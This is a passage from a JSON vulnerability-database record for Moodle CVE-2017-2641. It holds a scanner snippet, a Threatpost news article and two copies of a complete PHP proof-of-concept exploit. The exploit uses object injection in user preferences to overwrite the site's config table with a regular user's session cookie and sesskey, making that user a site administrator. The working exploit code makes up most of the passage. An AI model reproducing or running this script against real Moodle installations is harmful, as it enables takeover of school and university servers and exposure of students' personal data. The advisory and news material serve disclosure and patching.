rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:35", "description": "\nMoodle 2.x3.x - SQL Injection", "edition": 1, "published": "2017-04-06T00:00:00", "title": "Moodle 2.x3.x - SQL Injection", "type": 
"exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-06T00:00:00", "id": "EXPLOITPACK:EDD5BBB0F27374424D6D500AB0FDF561", "href": "", "sourceData": "# Exploit: Moodle SQL Injection via Object Injection Through User Preferences\n# Date: April 6th, 2017\n# Exploit Author: Marko Belzetski\n# Contact: mbelzetski@protonmail.com\n# Vendor Homepage: https://moodle.org/\n# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions\n# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04\n# CVE : CVE-2017-2641\n\n1. Description\nIn Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)\n\n2. PoC\nLog in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. 
Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.\n\n<?php\n\n//defining the required classes for our exploit\nnamespace gradereport_singleview\\local\\ui {\n class feedback{ \n }\n}\n\nnamespace {\n class gradereport_overview_external{\n}\n\nclass grade_item{\n}\n\nclass grade_grade{\n}\n\n\n// creating a simple httpPost method which requires php-curl\nfunction httpPost($url, $data, $MoodleSession, $json)\n{\n $curl = curl_init($url);\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\n if($json){\n array_push($headers, 'Content-Type: application/json');\n }else{\n $data = urldecode(http_build_query($data));\n }\n curl_setopt($curl, CURLOPT_POST, true);\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\n $response = curl_exec($curl);\n curl_close($curl);\n return $response;\n}\n\n// creating a simple httpGet method which requires php-curl\nfunction httpGet($url, $MoodleSession)\n{\n $curl = curl_init($url);\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\n $response = curl_exec($curl);\n curl_close($curl);\n return $response;\n}\n\nfunction update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){\n //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need\n $base = new gradereport_overview_external();\n\n // now we create the feedback object which inherits the vulnerable __tostring() method from its parent\n $fb = new 
gradereport_singleview\\local\\ui\\feedback();\n\n //filling the feedback object with the required properties for the exploit to work\n $fb -> grade = new grade_grade();\n $fb -> grade -> grade_item = new grade_item();\n $fb -> grade -> grade_item -> calculation = \"[[somestring\";\n $fb -> grade -> grade_item -> calculation_normalized = false;\n\n //setting the table which we want to alter\n $fb -> grade -> grade_item -> table = $table;\n //setting the row id of the row that we want to alter\n $fb -> grade -> grade_item -> id = $rowId;\n //setting the column with the value that we want to insert\n $fb -> grade -> grade_item -> $column = $value;\n $fb -> grade -> grade_item -> required_fields = array($column,'id');\n \n //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object\n $arr = array(array($base),$fb);\n \n //serializing the array\n $value = serialize($arr);\n\n //we'll set the course_blocks sortorder to 0 so we default to legacy user preference\n $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);\n httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\n\n //injecting the payload\n $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));\n httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);\n\n //getting the frontpage so the payload will activate\n httpGet($url.'/my/', $MoodleSession);\n }\n\n$url = ''; //url of the Moodle site\n$MoodleSession = '' //your MoodleSession cookie value\n$sesskey = ''; //your sesskey\n\n$table = \"config\"; //table to update \n$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. 
could vary from installation to installation\n$column = 'value'; //column name to update, which holds the userid\n$value = 3; // userid to set as 'siteadmins' Probably want to make it your own\n\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);\n\n//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration\n$rowId = 375 // row id of 'allversionshash' parameter\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));\n\n//reset the sortorder so we can see the front page again without the payload triggering\n$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);\nhttpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\n\n//force plugincheck so we can access admin panel\nhttpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);\n\n}\n?>\n\n\n3. Solution:\nUpgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:56", "bulletinFamily": "info", "cvelist": ["CVE-2017-2641"], "description": "A critical vulnerability in Moodle, an open source PHP-based learning management system deployed across scores of schools and universities, could expose the server its running on to compromise.\n\n[Tens of thousands of universities](<https://moodle.net/sites/index.php?country=US>) worldwide, including the California State University system, the University of Oxford, and Stanford University, use the service to provide students with course outlines, grades, and other personal data.\n\nThe issue\u2013at its root a SQL injection vulnerability\u2013could be used by an attacker to execute PHP code on a university\u2019s server according to Netanel Rubin, the researcher who found the bug.\n\nRubin, who has previously dug up vulnerabilities in [Mozilla\u2019s 
Bugzilla](<https://threatpost.com/details-surface-on-patched-bugzilla-privilege-escalation-flaw/114713/>) bug tracking system, e-commerce platform [Magento](<https://threatpost.com/remote-code-execution-hole-patched-in-magento-ecommerce-platform/112334/>), and [WordPress](<https://threatpost.com/wordpress-patches-serious-shortcodes-core-engine-vulnerability/114673/>), described the bug in depth [in a blog post](<http://netanelrub.in/2017/03/20/moodle-remote-code-execution/>) on Monday.\n\n> Ever wanted to hack a university? Well, now you probably can, with my new [#Moodle](<https://twitter.com/hashtag/Moodle?src=hash>) 0-day!<https://t.co/JUBo4LuU2C>\n> \n> \u2014 Netanel Rubin (@na7irub) [March 20, 2017](<https://twitter.com/na7irub/status/843797184172777472>)\n\nMoodle published details around the bug, including its CVE (CVE-2017-2641) [on Monday as well](<https://moodle.org/mod/forum/discuss.php?d=349419>), warning that an ordinary registered user could exploit the vulnerability via web interface.\n\n\u201cSimilar scenarios could be used in previous versions of Moodle but only by managers/admins and only via web services,\u201d the advisory reads.\n\nSchool IT administrators are being encouraged to apply a patch that maintainers of the system pushed 10 days ago. An update from early last week, [3.3.2](<https://docs.moodle.org/dev/Moodle_3.2.2_release_notes#Highlights>), also includes the fix.\n\n> [#Moodle](<https://twitter.com/hashtag/Moodle?src=hash>) 3.2.2, 3.1.5, 3.0.9 and 2.7.19 are now available! 
\nFind out more: <https://t.co/9jcS3qcJ83> \nOr to download: <https://t.co/i00mq1zwY8> [pic.twitter.com/zhTKKQhYSV](<https://t.co/zhTKKQhYSV>)\n> \n> \u2014 Moodle (@moodle) [March 13, 2017](<https://twitter.com/moodle/status/841287925702766593>)\n\nUntil patched, Rubin warns the vulnerability will continue to affect \u201calmost all Moodle versions,\u201d including 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.\n\nAccording to Rubin the vulnerability stems from a handful of small, logical vulnerabilities.\n\nMoodle is a project with lots of code\u2013two million lines, according to Rubin. Because of that and the fact that many developers oversee it, the system was designed with the assumption that one feature, user preferences, couldn\u2019t be taken advantage of.\n\nRubin discovered that he could exploit the feature however and get an unserialize call by leaving a preference in a block mechanism empty. That could open the door to an object injection attack.\n\nWhile the attack had its limitations, Rubin discovered a way to pivot from it to a series of method calls. From there, he found he could use the system\u2019s \u201cupdate\u201d method to update any row in an affected database. 
This gave him the ability to tweak administrator accounts, passwords, the site configuration, \u201cbasically whatever we want,\u201d he wrote.\n\nRubin used a double SQL injection to top off his exploit, helping him gain full administrator privileges on any server running Moodle.\n\n\u201cAfter gaining full administrator privileges executing code is as simple as uploading a new plugin or template to the server,\u201d Rubin writes.\n", "modified": "2017-03-21T18:48:57", "published": "2017-03-21T14:48:57", "id": "THREATPOST:EEAB5FD7E056F4A8CAFD6A3AAF9CE7C0", "href": "https://threatpost.com/critical-moodle-vulnerability-could-lead-to-server-compromise/124446/", "type": "threatpost", "title": "Critical Moodle Vulnerability Could Lead to Server Compromise", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-02-18T21:24:45", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-04-07T00:00:00", "type": "zdt", "title": "Moodle 2.x/3.x - SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-07T00:00:00", "href": "https://0day.today/exploit/description/27534", "id": "1337DAY-ID-27534", "sourceData": "# Exploit: Moodle SQL Injection via Object Injection Through User Preferences\r\n# Date: April 6th, 2017\r\n# Exploit Author: Marko Belzetski\r\n# Contact: [email\u00a0protected]\r\n# Vendor Homepage: https://moodle.org/\r\n# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions\r\n# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04\r\n# CVE : CVE-2017-2641\r\n \r\n1. 
Description\r\nIn Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)\r\n \r\n2. PoC\r\nLog in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.\r\n \r\n<?php\r\n \r\n//defining the required classes for our exploit\r\nnamespace gradereport_singleview\\local\\ui {\r\n class feedback{ \r\n }\r\n}\r\n \r\nnamespace {\r\n class gradereport_overview_external{\r\n}\r\n \r\nclass grade_item{\r\n}\r\n \r\nclass grade_grade{\r\n}\r\n \r\n \r\n// creating a simple httpPost method which requires php-curl\r\nfunction httpPost($url, $data, $MoodleSession, $json)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n if($json){\r\n array_push($headers, 'Content-Type: application/json');\r\n }else{\r\n $data = urldecode(http_build_query($data));\r\n }\r\n curl_setopt($curl, CURLOPT_POST, true);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n \r\n// creating a simple httpGet method which requires php-curl\r\nfunction httpGet($url, $MoodleSession)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, 
true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n \r\nfunction update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){\r\n //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need\r\n $base = new gradereport_overview_external();\r\n \r\n // now we create the feedback object which inherits the vulnerable __tostring() method from its parent\r\n $fb = new gradereport_singleview\\local\\ui\\feedback();\r\n \r\n //filling the feedback object with the required properties for the exploit to work\r\n $fb -> grade = new grade_grade();\r\n $fb -> grade -> grade_item = new grade_item();\r\n $fb -> grade -> grade_item -> calculation = \"[[somestring\";\r\n $fb -> grade -> grade_item -> calculation_normalized = false;\r\n \r\n //setting the table which we want to alter\r\n $fb -> grade -> grade_item -> table = $table;\r\n //setting the row id of the row that we want to alter\r\n $fb -> grade -> grade_item -> id = $rowId;\r\n //setting the column with the value that we want to insert\r\n $fb -> grade -> grade_item -> $column = $value;\r\n $fb -> grade -> grade_item -> required_fields = array($column,'id');\r\n \r\n //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object\r\n $arr = array(array($base),$fb);\r\n \r\n //serializing the array\r\n $value = serialize($arr);\r\n \r\n //we'll set the course_blocks sortorder to 0 so we default to legacy user preference\r\n $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);\r\n httpPost($url. 
'/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n \r\n //injecting the payload\r\n $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));\r\n httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);\r\n \r\n //getting the frontpage so the payload will activate\r\n httpGet($url.'/my/', $MoodleSession);\r\n }\r\n \r\n$url = ''; //url of the Moodle site\r\n$MoodleSession = '' //your MoodleSession cookie value\r\n$sesskey = ''; //your sesskey\r\n \r\n$table = \"config\"; //table to update \r\n$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation\r\n$column = 'value'; //column name to update, which holds the userid\r\n$value = 3; // userid to set as 'siteadmins' Probably want to make it your own\r\n \r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);\r\n \r\n//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration\r\n$rowId = 375 // row id of 'allversionshash' parameter\r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));\r\n \r\n//reset the sortorder so we can see the front page again without the payload triggering\r\n$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);\r\nhttpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n \r\n//force plugincheck so we can access admin panel\r\nhttpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);\r\n \r\n}\r\n?>\r\n \r\n \r\n3. Solution:\r\nUpgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/27534", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}